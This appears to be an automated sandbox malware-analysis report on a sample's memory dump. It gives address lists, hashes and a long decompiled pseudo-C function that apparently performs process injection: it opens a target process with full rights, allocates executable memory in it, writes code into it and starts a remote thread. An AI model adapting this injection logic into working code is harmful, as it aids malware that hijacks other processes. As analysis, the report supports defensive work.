0x00407faf
0x00407fb3
0x00407fb5
0x00407fb8
0x00407fbf
0x00407fc5
0x00407fc7
0x00407fc7
0x00407fcc
0x00407fd0
0x00407fd0
0x00000000
0x00407e22
0x00407e22
0x00407e2a
0x00407e33
0x00407e33
0x00000000
0x00407e2a
0x00407e20
0x00000000

Strings

str, xrefs: 00407CA3, 00407CBA

Memory Dump Source

Source File: 00000001.00000002.592946882.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.592977672.0000000000418000.00000040.00000001.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID: str
API String ID: 2591292051-1554949113
Opcode ID: c6a6f2c26ba500ca6e0c3946d156c39a33a96f5a642209db848b1eb0a752bc1c
Instruction ID: 4d9b6297531fc0fc61500258ab96dcbb9c8611b7c758c785de1226f445b246b5
Opcode Fuzzy Hash: c6a6f2c26ba500ca6e0c3946d156c39a33a96f5a642209db848b1eb0a752bc1c
Instruction Fuzzy Hash: 64F13D706083819BE720EF66C94176BB7E5AFC4304F10893FB598A72D2DB789845CB67

Uniqueness

Uniqueness Score: -1.00%

Function 0040BB48, Relevance: .8, Instructions: 777
COMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E0040BB48(signed short** __eax, void* __ecx, char __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t262;
				intOrPtr* _t263;
				signed int _t266;
				void* _t273;
				void* _t279;
				intOrPtr* _t283;
				intOrPtr _t284;
				intOrPtr* _t292;
				intOrPtr* _t301;
				void* _t306;
				signed int _t309;
				signed int _t315;
				signed int _t322;
				signed int _t324;
				signed int _t331;
				intOrPtr* _t333;
				intOrPtr* _t337;
				intOrPtr* _t340;
				intOrPtr* _t344;
				intOrPtr* _t347;
				intOrPtr* _t351;
				signed int _t352;
				signed int _t387;
				signed int _t395;
				void* _t399;
				signed int _t402;
				signed int _t408;
				signed int _t416;
				intOrPtr* _t432;
				intOrPtr* _t435;
				void* _t463;
				void* _t464;
				void* _t470;
				signed short* _t478;
				intOrPtr _t482;
				signed int _t496;
				signed int _t497;
				signed int _t499;
				void* _t500;
				intOrPtr _t574;
				intOrPtr _t581;
				signed int _t590;
				signed int _t591;
				signed short* _t594;
				void* _t596;
				void* _t597;
				signed int _t599;
				signed int _t601;
				signed int _t603;
				void* _t605;
				void* _t606;
				void* _t607;

				_t500 = __ecx;
				_t601 = __eax;
				_t590 = __edx;
				_t594 =  *__eax;
				_t1 =  &(_t594[1]); // 0x416c56
				_t478 = _t1;
				if(_t594 == 0 || ( *_t594 & 0x0000ffff) == 0) {
					L5:
					return 0;
				} else {
					_t596 = 0;
					do {
						_t262 =  *_t478 & 0x0000ffff;
						_t596 = _t596 + 1;
						_t478 =  &(_t478[1]);
					} while (_t262 != 0);
					if(_t596 != 0) {
						__eflags =  *0x416c58;
						if( *0x416c58 != 0) {
							_t263 = 0x416c54;
						} else {
							_t263 = E00408ED0(__edx);
						}
						__eflags =  *_t263 - 0x33;
						if( *_t263 <= 0x33) {
							L13:
							return E00408B74(_t601);
						} else {
							__eflags =  *((intOrPtr*)(_t263 + 0x14)) - 4;
							if( *((intOrPtr*)(_t263 + 0x14)) > 4) {
								goto L13;
							} else {
								_t266 = E0040CAB0(_t500);
								__eflags = _t266;
								if(_t266 != 0) {
									__eflags = E0040AE80(_t590);
									if(__eflags == 0) {
										E00406070(_t606 + 0xa4, __eflags);
										_t597 = E004065A0(_t606 + 0xa4);
										_push(0x2e);
										_t6 = _t597 + 0x20; // 0x20
										E0040C760(_t6, _t597, _t606 + 0x84);
										 *((intOrPtr*)(_t606 + 0x8c)) = 0;
										 *((intOrPtr*)(_t606 + 0x90)) = 0;
										E0040EA50(_t606 + 0x94,  *((intOrPtr*)(_t606 + 0x88)), 0);
										E0040C6E0( *((intOrPtr*)(_t606 + 0x8c)));
										_t607 = _t606 + 4;
										_t273 = E0040C700(_t607 + 0x8c);
										E0040BAB4( *((intOrPtr*)(_t607 + 0x8c)));
										 *((intOrPtr*)(_t607 + 0x8c)) = 0;
										 *((intOrPtr*)(_t607 + 0x90)) = 0;
										E0040BAB4( *((intOrPtr*)(_t607 + 0x84)));
										__eflags = _t273 - 0xe7ffacee;
										 *((intOrPtr*)(_t607 + 0x84)) = 0;
										 *((intOrPtr*)(_t607 + 0x88)) = 0;
										if(_t273 == 0xe7ffacee) {
											_t482 =  *((intOrPtr*)(_t597 + 0x18));
											_t279 = E0040CA00(_t597);
											goto L24;
										} else {
											__eflags =  *(_t607 + 0xa8);
											if( *(_t607 + 0xa8) <= 0) {
												_t482 = 0;
												_t599 = 0;
											} else {
												 *(_t607 + 0x1c) = _t601;
												_t499 = 0;
												__eflags = 0;
												 *(_t607 + 0x20) = _t590;
												do {
													_t605 = E00406340(_t607 + 0xa8, _t499);
													_t463 = E00405EC4(_t605);
													_t464 = E00405EC4(_t597);
													__eflags = _t463 - _t464;
													if(_t463 != _t464) {
														goto L21;
													} else {
														_push(0x2e);
														_t24 = _t605 + 0x20; // 0x20
														E0040C760(_t24, _t597, _t607 + 0x6c);
														 *((intOrPtr*)(_t607 + 0x74)) = 0;
														 *((intOrPtr*)(_t607 + 0x78)) = 0;
														E0040EA50(_t607 + 0x7c,  *((intOrPtr*)(_t607 + 0x70)), 0);
														E0040C6E0( *((intOrPtr*)(_t607 + 0x74)));
														_t607 = _t607 + 4;
														_t470 = E0040C700(_t607 + 0x74);
														E0040BAB4( *((intOrPtr*)(_t607 + 0x74)));
														 *((intOrPtr*)(_t607 + 0x74)) = 0;
														 *((intOrPtr*)(_t607 + 0x78)) = 0;
														E0040BAB4( *((intOrPtr*)(_t607 + 0x6c)));
														__eflags = _t470 - 0xe7ffacee;
														 *((intOrPtr*)(_t607 + 0x6c)) = 0;
														 *((intOrPtr*)(_t607 + 0x70)) = 0;
														if(_t470 == 0xe7ffacee) {
															_t601 =  *(_t607 + 0x1c);
															_t590 =  *(_t607 + 0x20);
															_t482 =  *((intOrPtr*)(_t605 + 0x18));
															_t279 = E0040CA00(_t605);
															L24:
															__eflags = _t279 - 0x40;
															_t599 =  !=  ? 0 : 1;
														} else {
															goto L21;
														}
													}
													goto L25;
													L21:
													_t499 = _t499 + 1;
													__eflags = _t499 -  *(_t607 + 0xa8);
												} while (_t499 <  *(_t607 + 0xa8));
												_t482 = 0;
												_t601 =  *(_t607 + 0x1c);
												_t599 = 0;
												_t590 =  *(_t607 + 0x20);
											}
										}
										L25:
										L00408280(_t482, _t607 + 0xa4, _t590);
										_t283 = E0040E4B4(0x67, _t599);
										_t284 =  *_t283(0x1f0fff, 0, _t482);
										 *((intOrPtr*)(_t607 + 0xa0)) = _t284;
										 *((intOrPtr*)(_t607 + 0x94)) = _t284;
										 *((char*)(_t607 + 0x98)) = 1;
										__eflags = E004019A0(_t607 + 0x94);
										if(__eflags == 0) {
											E00408190(_t607 + 0x94, _t599, __eflags);
											__eflags = 0;
											return 0;
										} else {
											 *((intOrPtr*)(_t607 + 0x7c)) = 0;
											 *((intOrPtr*)(_t607 + 0x80)) = 0;
											E0040E060(_t607 + 0x80, _t599, 0);
											 *(_t607 + 0x9c) = 0;
											__eflags = _t599;
											if(_t599 == 0) {
												E00407450(_t607 + 0x3c, 0x1c18);
												 *((intOrPtr*)(_t607 + 0x30)) = E00409700(_t607 + 0x3c, 0);
												_t292 = E0040E4B4(0x8d, _t599);
												 *(_t607 + 0x34) =  *_t292( *((intOrPtr*)(_t607 + 0xb0)), 0, 0x1c18, 0x3000, 4);
												__eflags =  *(_t607 + 0x34);
												if( *(_t607 + 0x34) == 0) {
													E0040AE90(_t607 + 0x38, _t599);
													E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
													__eflags =  *((char*)(_t607 + 0x98));
													if( *((char*)(_t607 + 0x98)) != 0) {
														__eflags = 0;
														 *((intOrPtr*)(_t607 + 0x80)) = 0;
														 *((intOrPtr*)(_t607 + 0x7c)) = 0;
														E00408190(_t607 + 0x94, _t599, 0);
													}
													__eflags = 0;
													return 0;
												} else {
													_t301 = E0040E4B4(0x8d, _t599);
													_t600 =  *_t301( *((intOrPtr*)(_t607 + 0xb0)), 0, 0x2c8, 0x3000, 0x40);
													__eflags = _t600;
													if(__eflags != 0) {
														 *(_t607 + 0xc) = _t600;
														E0040CAEC( *((intOrPtr*)(_t607 + 0x30)),  *(_t607 + 0x34), _t601, __eflags);
														_t574 =  *((intOrPtr*)(_t607 + 0x7c));
														_t306 =  *((intOrPtr*)(_t607 + 0x30)) + 0x138;
														__eflags = _t574 - _t306;
														if(_t574 != _t306) {
															E0040E9F0(_t607 + 0x84, _t306, 0);
															_t574 =  *((intOrPtr*)(_t607 + 0x7c));
														}
														_push(4);
														_push(3);
														_push(3);
														_push(_t574);
														E0040367C(_t607 + 0x2c);
														_t309 = E004019A0(_t607 + 0x28);
														__eflags = _t309;
														if(_t309 != 0) {
															E004019C0(_t607 + 0x24, __eflags, E00409700(_t590, 0),  *((intOrPtr*)(_t590 + 8)));
															__eflags =  *((char*)(_t607 + 0x2c));
															if(__eflags != 0) {
																E00408190(_t607 + 0x28, _t600, __eflags);
															}
															E0040BAB4( *(_t607 + 0x1c));
															 *(_t607 + 0x1c) = 0;
															 *(_t607 + 0x20) = 0;
															_t315 = E0040E4B4(0x97, _t600);
															__eflags = _t315;
															if(_t315 == 0) {
																 *(_t607 + 0x9c) = 0x7f;
																goto L96;
															} else {
																_t322 =  *_t315( *((intOrPtr*)(_t607 + 0xb0)),  *((intOrPtr*)(_t607 + 0x40)),  *((intOrPtr*)(_t607 + 0x38)), 0x1c18, 0);
																__eflags = _t322;
																if(_t322 == 0) {
																	E0040EAB0();
																	 *(_t607 + 0x9c) = _t322;
																	__eflags = _t322;
																	if(_t322 != 0) {
																		L96:
																		E0040AE90(_t607 + 0x38, _t600);
																		E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
																		__eflags =  *((char*)(_t607 + 0x98));
																		if( *((char*)(_t607 + 0x98)) != 0) {
																			__eflags = 0;
																			 *((intOrPtr*)(_t607 + 0x80)) = 0;
																			 *((intOrPtr*)(_t607 + 0x7c)) = 0;
																			E00408190(_t607 + 0x94, _t600, 0);
																		}
																		__eflags = 0;
																		return 0;
																	} else {
																		goto L85;
																	}
																} else {
																	 *(_t607 + 0x9c) = 0;
																	L85:
																	_t324 = E0040E4B4(0x97, _t600);
																	__eflags = _t324;
																	if(_t324 == 0) {
																		 *(_t607 + 0x9c) = 0x7f;
																		goto L92;
																	} else {
																		_t331 =  *_t324( *((intOrPtr*)(_t607 + 0xb0)), _t600,  &E00416540, 0x2c8, 0);
																		__eflags = _t331;
																		if(_t331 == 0) {
																			E0040EAB0();
																			 *(_t607 + 0x9c) = _t331;
																			__eflags = _t331;
																			if(_t331 != 0) {
																				L92:
																				E0040AE90(_t607 + 0x38, _t600);
																				E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
																				__eflags =  *((char*)(_t607 + 0x98));
																				if( *((char*)(_t607 + 0x98)) != 0) {
																					__eflags = 0;
																					 *((intOrPtr*)(_t607 + 0x80)) = 0;
																					 *((intOrPtr*)(_t607 + 0x7c)) = 0;
																					E00408190(_t607 + 0x94, _t600, 0);
																				}
																				__eflags = 0;
																				return 0;
																			} else {
																				goto L88;
																			}
																		} else {
																			 *(_t607 + 0x9c) = 0;
																			L88:
																			_t333 = E0040E4B4(0x13, _t600);
																			 *_t333( *((intOrPtr*)(_t607 + 0xb8)), 0, 0, _t600,  *((intOrPtr*)(_t607 + 0x3c)), 0, 0);
																			__eflags = 0;
																			if(0 == 0) {
																				E0040EAB0();
																				 *(_t607 + 0x9c) = 0;
																				__eflags = 0;
																				if(0 == 0) {
																					goto L90;
																				} else {
																					E0040AE90(_t607 + 0x38, _t600);
																					E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
																					__eflags =  *((char*)(_t607 + 0x98));
																					if( *((char*)(_t607 + 0x98)) != 0) {
																						__eflags = 0;
																						 *((intOrPtr*)(_t607 + 0x80)) = 0;
																						 *((intOrPtr*)(_t607 + 0x7c)) = 0;
																						E00408190(_t607 + 0x94, _t600, 0);
																					}
																					__eflags = 0;
																					return 0;
																				}
																			} else {
																				 *(_t607 + 0x9c) = 0;
																				L90:
																				_t337 = E0040E4B4(0x93, _t600);
																				 *_t337(0, 0xffffffff);
																				 *(_t607 + 0x9c) = 0;
																				_t340 = E0040E4B4(0x35, _t600);
																				 *_t340(0, _t607 + 0x9c);
																				_t344 = E0040E4B4(0x8f, _t600);
																				 *_t344( *((intOrPtr*)(_t607 + 0xac)), _t600, 0, 0x8000);
																				_t347 = E0040E4B4(0x8f, _t600);
																				 *_t347( *((intOrPtr*)(_t607 + 0xac)),  *((intOrPtr*)(_t607 + 0x3c)), 0, 0x8000);
																				E0040AE90(_t607 + 0x38, _t600);
																				goto L47;
																			}
																		}
																	}
																}
															}
														} else {
															__eflags =  *((char*)(_t607 + 0x2c));
															if(__eflags != 0) {
																E00408190(_t607 + 0x28, _t600, __eflags);
															}
															E0040BAB4( *(_t607 + 0x1c));
															 *(_t607 + 0x1c) = 0;
															 *(_t607 + 0x20) = 0;
															E0040AE90(_t607 + 0x38, _t600);
															E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
															__eflags =  *((char*)(_t607 + 0x98));
															if( *((char*)(_t607 + 0x98)) != 0) {
																__eflags = 0;
																 *((intOrPtr*)(_t607 + 0x80)) = 0;
																 *((intOrPtr*)(_t607 + 0x7c)) = 0;
																E00408190(_t607 + 0x94, _t600, 0);
															}
															__eflags = 0;
															return 0;
														}
													} else {
														E0040AE90(_t607 + 0x38, _t600);
														E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
														__eflags =  *((char*)(_t607 + 0x98));
														if( *((char*)(_t607 + 0x98)) != 0) {
															__eflags = 0;
															 *((intOrPtr*)(_t607 + 0x80)) = 0;
															 *((intOrPtr*)(_t607 + 0x7c)) = 0;
															E00408190(_t607 + 0x94, _t600, 0);
														}
														__eflags = 0;
														return 0;
													}
												}
											} else {
												E00407450(_t607 + 0x60, 0x1c40);
												 *((intOrPtr*)(_t607 + 0x24)) = E00409700(_t607 + 0x60, 0);
												 *(_t607 + 4) = 0;
												 *(_t607 + 8) = 0;
												 *(_t607 + 0xc) = 0x1c40;
												 *(_t607 + 0x10) = 0;
												_t387 = E0040C7FC( *((intOrPtr*)(_t607 + 0xa0)), 4, 0x3000, __eflags);
												 *(_t607 + 0x28) = _t387;
												_t600 = 0x3000;
												__eflags = _t387 | 0x00003000;
												if(__eflags == 0) {
													E0040AE90(_t607 + 0x5c, 0x3000);
													E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
													__eflags =  *((char*)(_t607 + 0x98));
													if( *((char*)(_t607 + 0x98)) != 0) {
														__eflags = 0;
														 *((intOrPtr*)(_t607 + 0x80)) = 0;
														 *((intOrPtr*)(_t607 + 0x7c)) = 0;
														E00408190(_t607 + 0x94, 0x3000, 0);
													}
													__eflags = 0;
													return 0;
												} else {
													 *(_t607 + 4) = 0;
													 *(_t607 + 8) = 0;
													 *(_t607 + 0xc) = 0x3a4;
													 *(_t607 + 0x10) = 0;
													_t395 = E0040C7FC( *((intOrPtr*)(_t607 + 0xa0)), 0x40, 0x3000, __eflags);
													 *(_t607 + 0x20) = _t395;
													 *(_t607 + 0x1c) = 0x3000;
													__eflags = _t395 |  *(_t607 + 0x1c);
													if(__eflags != 0) {
														 *(_t607 + 8) =  *(_t607 + 0x28);
														 *(_t607 + 0xc) = 0x3000;
														 *(_t607 + 0x10) = _t395;
														 *(_t607 + 0x14) =  *(_t607 + 0x1c);
														E0040D528( *((intOrPtr*)(_t607 + 0x24)), 0x40, _t601, __eflags);
														_t581 =  *((intOrPtr*)(_t607 + 0x7c));
														_t399 =  *((intOrPtr*)(_t607 + 0x24)) + 0x160;
														__eflags = _t581 - _t399;
														if(_t581 != _t399) {
															E0040E9F0(_t607 + 0x84, _t399, 0);
															_t581 =  *((intOrPtr*)(_t607 + 0x7c));
														}
														_push(4);
														_push(3);
														_push(3);
														_push(_t581);
														E0040367C(_t607 + 0x58);
														_t402 = E004019A0(_t607 + 0x54);
														__eflags = _t402;
														if(_t402 != 0) {
															E004019C0(_t607 + 0x50, __eflags, E00409700(_t590, 0),  *((intOrPtr*)(_t590 + 8)));
															__eflags =  *((char*)(_t607 + 0x58));
															if(__eflags != 0) {
																E00408190(_t607 + 0x54, _t600, __eflags);
															}
															E0040BAB4( *((intOrPtr*)(_t607 + 0x48)));
															 *(_t607 + 4) =  *(_t607 + 0x28);
															 *(_t607 + 8) = _t600;
															 *(_t607 + 0x14) = 0;
															 *((intOrPtr*)(_t607 + 0x48)) = 0;
															 *((intOrPtr*)(_t607 + 0x4c)) = 0;
															_t408 = E0040C8BC( *((intOrPtr*)(_t607 + 0xa0)), 0x1c40,  *((intOrPtr*)(_t607 + 0x24)), __eflags);
															 *(_t607 + 0x9c) = _t408;
															__eflags = _t408;
															if(__eflags == 0) {
																E0040AE90(_t607 + 0x5c, _t600);
																E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
																__eflags =  *((char*)(_t607 + 0x98));
																if( *((char*)(_t607 + 0x98)) != 0) {
																	__eflags = 0;
																	 *((intOrPtr*)(_t607 + 0x80)) = 0;
																	 *((intOrPtr*)(_t607 + 0x7c)) = 0;
																	E00408190(_t607 + 0x94, _t600, 0);
																}
																__eflags = 0;
																return 0;
															} else {
																_t496 =  *(_t607 + 0x20);
																 *(_t607 + 4) = _t496;
																_t603 =  *(_t607 + 0x1c);
																 *(_t607 + 8) = _t603;
																 *(_t607 + 0x14) = 0;
																_t416 = E0040C8BC( *((intOrPtr*)(_t607 + 0xa0)), 0x3a4, 0x416820, __eflags);
																 *(_t607 + 0x9c) = _t416;
																__eflags = _t416;
																if(__eflags == 0) {
																	E0040AE90(_t607 + 0x5c, _t600);
																	E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
																	__eflags =  *((char*)(_t607 + 0x98));
																	if( *((char*)(_t607 + 0x98)) != 0) {
																		__eflags = 0;
																		 *((intOrPtr*)(_t607 + 0x80)) = 0;
																		 *((intOrPtr*)(_t607 + 0x7c)) = 0;
																		E00408190(_t607 + 0x94, _t600, 0);
																	}
																	__eflags = 0;
																	return 0;
																} else {
																	 *(_t607 + 4) = _t496;
																	 *(_t607 + 8) = _t603;
																	_t591 =  *(_t607 + 0x28);
																	 *(_t607 + 0xc) = _t591;
																	 *(_t607 + 0x10) = _t600;
																	_t497 = E0040D44C( *((intOrPtr*)(_t607 + 0xa0)), _t496, 0, 0, __eflags);
																	__eflags = _t497;
																	if(_t497 == 0) {
																		E0040AE90(_t607 + 0x5c, _t600);
																		E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
																		__eflags =  *((char*)(_t607 + 0x98));
																		if( *((char*)(_t607 + 0x98)) != 0) {
																			__eflags = 0;
																			 *((intOrPtr*)(_t607 + 0x80)) = 0;
																			 *((intOrPtr*)(_t607 + 0x7c)) = 0;
																			E00408190(_t607 + 0x94, _t600, 0);
																		}
																		__eflags = 0;
																		return 0;
																	} else {
																		_t432 = E0040E4B4(0x93, _t600);
																		 *_t432(_t497, 0xffffffff);
																		 *(_t607 + 0x9c) = 0;
																		_t435 = E0040E4B4(0x35, _t600);
																		 *_t435(_t497, _t607 + 0x9c);
																		 *(_t607 + 4) =  *(_t607 + 0x20);
																		 *(_t607 + 8) =  *(_t607 + 0x1c);
																		 *(_t607 + 0xc) = 0;
																		 *(_t607 + 0x10) = 0;
																		E0040C968( *((intOrPtr*)(_t607 + 0xa0)), 0x8000, __eflags);
																		 *(_t607 + 4) = _t591;
																		 *(_t607 + 8) = _t600;
																		 *(_t607 + 0xc) = 0;
																		 *(_t607 + 0x10) = 0;
																		E0040C968( *((intOrPtr*)(_t607 + 0xa0)), 0x8000, __eflags);
																		E0040AE90(_t607 + 0x5c, _t600);
																		while(1) {
																			L47:
																			_t351 = E0040E4B4(0x17, _t600);
																			_t352 =  *_t351( *((intOrPtr*)(_t607 + 0x7c)));
																			 *(_t607 + 0x9c) = _t352;
																			__eflags = _t352;
																			if(_t352 != 0) {
																				break;
																			}
																			E00402024(0x3e8, _t600);
																		}
																		E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
																		__eflags =  *((char*)(_t607 + 0x98));
																		if( *((char*)(_t607 + 0x98)) != 0) {
																			__eflags = 0;
																			 *((intOrPtr*)(_t607 + 0x80)) = 0;
																			 *((intOrPtr*)(_t607 + 0x7c)) = 0;
																			E00408190(_t607 + 0x94, _t600, 0);
																		}
																		return 1;
																	}
																}
															}
														} else {
															__eflags =  *((char*)(_t607 + 0x58));
															if(__eflags != 0) {
																E00408190(_t607 + 0x54, _t600, __eflags);
															}
															E0040BAB4( *((intOrPtr*)(_t607 + 0x48)));
															 *((intOrPtr*)(_t607 + 0x48)) = 0;
															 *((intOrPtr*)(_t607 + 0x4c)) = 0;
															E0040AE90(_t607 + 0x5c, _t600);
															E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
															__eflags =  *((char*)(_t607 + 0x98));
															if( *((char*)(_t607 + 0x98)) != 0) {
																__eflags = 0;
																 *((intOrPtr*)(_t607 + 0x80)) = 0;
																 *((intOrPtr*)(_t607 + 0x7c)) = 0;
																E00408190(_t607 + 0x94, _t600, 0);
															}
															__eflags = 0;
															return 0;
														}
													} else {
														E0040AE90(_t607 + 0x5c, 0x3000);
														E0040BAB4( *((intOrPtr*)(_t607 + 0x7c)));
														__eflags =  *((char*)(_t607 + 0x98));
														if( *((char*)(_t607 + 0x98)) != 0) {
															__eflags = 0;
															 *((intOrPtr*)(_t607 + 0x80)) = 0;
															 *((intOrPtr*)(_t607 + 0x7c)) = 0;
															E00408190(_t607 + 0x94, 0x3000, 0);
														}
														__eflags = 0;
														return 0;
													}
												}
											}
										}
									} else {
										__eflags = 0;
										return 0;
									}
								} else {
									__eflags = 0;
									return 0;
								}
							}
						}
					} else {
						goto L5;
					}
				}
			}

0x0040bb48
0x0040bb52
0x0040bb54
0x0040bb56
0x0040bb5b
0x0040bb5b
0x0040bb5e
0x0040bb78
0x0040bb84
0x0040bb67
0x0040bb67
0x0040bb69
0x0040bb69
0x0040bb6c
0x0040bb6d
0x0040bb70
0x0040bb76
0x0040bb85
0x0040bb8c
0x0040bb95
0x0040bb8e
0x0040bb8e
0x0040bb8e
0x0040bb9a
0x0040bb9d
0x0040bbbb
0x0040bbcc
0x0040bb9f
0x0040bb9f
0x0040bba3
0x00000000
0x0040bba5
0x0040bba5
0x0040bbaa
0x0040bbac
0x0040bbd4
0x0040bbd6
0x0040bbec
0x0040bbfd
0x0040bc06
0x0040bc09
0x0040bc0c
0x0040bc13
0x0040bc1a
0x0040bc30
0x0040bc3c
0x0040bc41
0x0040bc4b
0x0040bc59
0x0040bc67
0x0040bc6e
0x0040bc75
0x0040bc7c
0x0040bc82
0x0040bc89
0x0040bc90
0x0040bd5f
0x0040bd62
0x00000000
0x0040bc96
0x0040bc96
0x0040bc9e
0x0040c151
0x0040c153
0x0040bca4
0x0040bca4
0x0040bca8
0x0040bca8
0x0040bcaa
0x0040bcae
0x0040bcbb
0x0040bcbf
0x0040bcc8
0x0040bccd
0x0040bccf
0x00000000
0x0040bcd1
0x0040bcd5
0x0040bcd8
0x0040bcdb
0x0040bce2
0x0040bce6
0x0040bcf3
0x0040bcfc
0x0040bd01
0x0040bd08
0x0040bd13
0x0040bd1e
0x0040bd22
0x0040bd26
0x0040bd2d
0x0040bd33
0x0040bd37
0x0040bd3b
0x0040c13c
0x0040c140
0x0040c144
0x0040c147
0x0040bd67
0x0040bd6c
0x0040bd74
0x00000000
0x00000000
0x00000000
0x0040bd3b
0x00000000
0x0040bd41
0x0040bd41
0x0040bd42
0x0040bd42
0x0040bd4f
0x0040bd51
0x0040bd55
0x0040bd57
0x0040bd57
0x0040bc9e
0x0040bd77
0x0040bd7e
0x0040bd88
0x0040bd95
0x0040bd97
0x0040bda7
0x0040bdae
0x0040bdbb
0x0040bdbd
0x0040c128
0x0040c12d
0x0040c139
0x0040bdc3
0x0040bdc5
0x0040bdc9
0x0040bdd8
0x0040bddd
0x0040bde8
0x0040bdea
0x0040c2a7
0x0040c2b7
0x0040c2c0
0x0040c2dc
0x0040c2e0
0x0040c2e5
0x0040c695
0x0040c69e
0x0040c6a3
0x0040c6ab
0x0040c6ad
0x0040c6b6
0x0040c6bd
0x0040c6c1
0x0040c6c1
0x0040c6c6
0x0040c6d2
0x0040c2eb
0x0040c2f0
0x0040c30c
0x0040c30e
0x0040c310
0x0040c354
0x0040c362
0x0040c36b
0x0040c36f
0x0040c375
0x0040c377
0x0040c383
0x0040c388
0x0040c388
0x0040c38c
0x0040c393
0x0040c394
0x0040c395
0x0040c39a
0x0040c3a3
0x0040c3a8
0x0040c3aa
0x0040c422
0x0040c427
0x0040c42c
0x0040c432
0x0040c432
0x0040c43b
0x0040c447
0x0040c44b
0x0040c44f
0x0040c454
0x0040c456
0x0040c5bc
0x00000000
0x0040c45c
0x0040c472
0x0040c474
0x0040c476
0x0040c678
0x0040c67d
0x0040c684
0x0040c686
0x0040c5c7
0x0040c5cb
0x0040c5d4
0x0040c5d9
0x0040c5e1
0x0040c5e3
0x0040c5ec
0x0040c5f3
0x0040c5f7
0x0040c5f7
0x0040c5fc
0x0040c608
0x0040c68c
0x00000000
0x0040c68c
0x0040c47c
0x0040c47c
0x0040c487
0x0040c48c
0x0040c491
0x0040c493
0x0040c56f
0x00000000
0x0040c499
0x0040c4ad
0x0040c4af
0x0040c4b1
0x0040c65f
0x0040c664
0x0040c66b
0x0040c66d
0x0040c57a
0x0040c57e
0x0040c587
0x0040c58c
0x0040c594
0x0040c596
0x0040c59f
0x0040c5a6
0x0040c5aa
0x0040c5aa
0x0040c5af
0x0040c5bb
0x0040c673
0x00000000
0x0040c673
0x0040c4b7
0x0040c4b7
0x0040c4c2
0x0040c4c7
0x0040c4e0
0x0040c4e4
0x0040c4e6
0x0040c609
0x0040c60e
0x0040c615
0x0040c617
0x00000000
0x0040c61d
0x0040c621
0x0040c62a
0x0040c62f
0x0040c637
0x0040c639
0x0040c642
0x0040c649
0x0040c64d
0x0040c64d
0x0040c652
0x0040c65e
0x0040c65e
0x0040c4ec
0x0040c4ec
0x0040c4f7
0x0040c4fc
0x0040c504
0x0040c50b
0x0040c516
0x0040c526
0x0040c52d
0x0040c541
0x0040c548
0x0040c55f
0x0040c565
0x00000000
0x0040c565
0x0040c4e6
0x0040c4b1
0x0040c493
0x0040c476
0x0040c3ac
0x0040c3ac
0x0040c3b1
0x0040c3b7
0x0040c3b7
0x0040c3c0
0x0040c3cb
0x0040c3cf
0x0040c3d3
0x0040c3dc
0x0040c3e1
0x0040c3e9
0x0040c3eb
0x0040c3f4
0x0040c3fb
0x0040c3ff
0x0040c3ff
0x0040c404
0x0040c410
0x0040c410
0x0040c312
0x0040c316
0x0040c31f
0x0040c324
0x0040c32c
0x0040c32e
0x0040c337
0x0040c33e
0x0040c342
0x0040c342
0x0040c347
0x0040c353
0x0040c353
0x0040c310
0x0040bdf0
0x0040bdf9
0x0040be09
0x0040be0f
0x0040be18
0x0040be21
0x0040be29
0x0040be34
0x0040be39
0x0040be3d
0x0040be41
0x0040be43
0x0040c260
0x0040c269
0x0040c26e
0x0040c276
0x0040c278
0x0040c281
0x0040c288
0x0040c28c
0x0040c28c
0x0040c291
0x0040c29d
0x0040be49
0x0040be50
0x0040be59
0x0040be5d
0x0040be65
0x0040be70
0x0040be75
0x0040be79
0x0040be7f
0x0040be83
0x0040becd
0x0040bed1
0x0040bed7
0x0040bedf
0x0040bee7
0x0040bef0
0x0040bef4
0x0040befa
0x0040befc
0x0040bf08
0x0040bf0d
0x0040bf0d
0x0040bf11
0x0040bf18
0x0040bf19
0x0040bf1a
0x0040bf1f
0x0040bf28
0x0040bf2d
0x0040bf2f
0x0040bfa7
0x0040bfac
0x0040bfb1
0x0040bfb7
0x0040bfb7
0x0040bfc0
0x0040bfcb
0x0040bfd4
0x0040bfd8
0x0040bfe7
0x0040bfeb
0x0040bfef
0x0040bff4
0x0040bffb
0x0040bffd
0x0040c21e
0x0040c227
0x0040c22c
0x0040c234
0x0040c236
0x0040c23f
0x0040c246
0x0040c24a
0x0040c24a
0x0040c24f
0x0040c25b
0x0040c003
0x0040c003
0x0040c00c
0x0040c015
0x0040c019
0x0040c01d
0x0040c02c
0x0040c031
0x0040c038
0x0040c03a
0x0040c1dc
0x0040c1e5
0x0040c1ea
0x0040c1f2
0x0040c1f4
0x0040c1fd
0x0040c204
0x0040c208
0x0040c208
0x0040c20d
0x0040c219
0x0040c040
0x0040c042
0x0040c048
0x0040c04c
0x0040c050
0x0040c054
0x0040c064
0x0040c066
0x0040c068
0x0040c19a
0x0040c1a3
0x0040c1a8
0x0040c1b0
0x0040c1b2
0x0040c1bb
0x0040c1c2
0x0040c1c6
0x0040c1c6
0x0040c1cb
0x0040c1d7
0x0040c06e
0x0040c073
0x0040c07b
0x0040c082
0x0040c08d
0x0040c09d
0x0040c0a5
0x0040c0b2
0x0040c0b6
0x0040c0ba
0x0040c0c5
0x0040c0ce
0x0040c0d2
0x0040c0d6
0x0040c0da
0x0040c0ea
0x0040c0f3
0x0040c104
0x0040c104
0x0040c109
0x0040c112
0x0040c114
0x0040c11b
0x0040c11d
0x00000000
0x00000000
0x0040c0ff
0x0040c0ff
0x0040c15e
0x0040c163
0x0040c16b
0x0040c16d
0x0040c176
0x0040c17d
0x0040c181
0x0040c181
0x0040c195
0x0040c195
0x0040c068
0x0040c03a
0x0040bf31
0x0040bf31
0x0040bf36
0x0040bf3c
0x0040bf3c
0x0040bf45
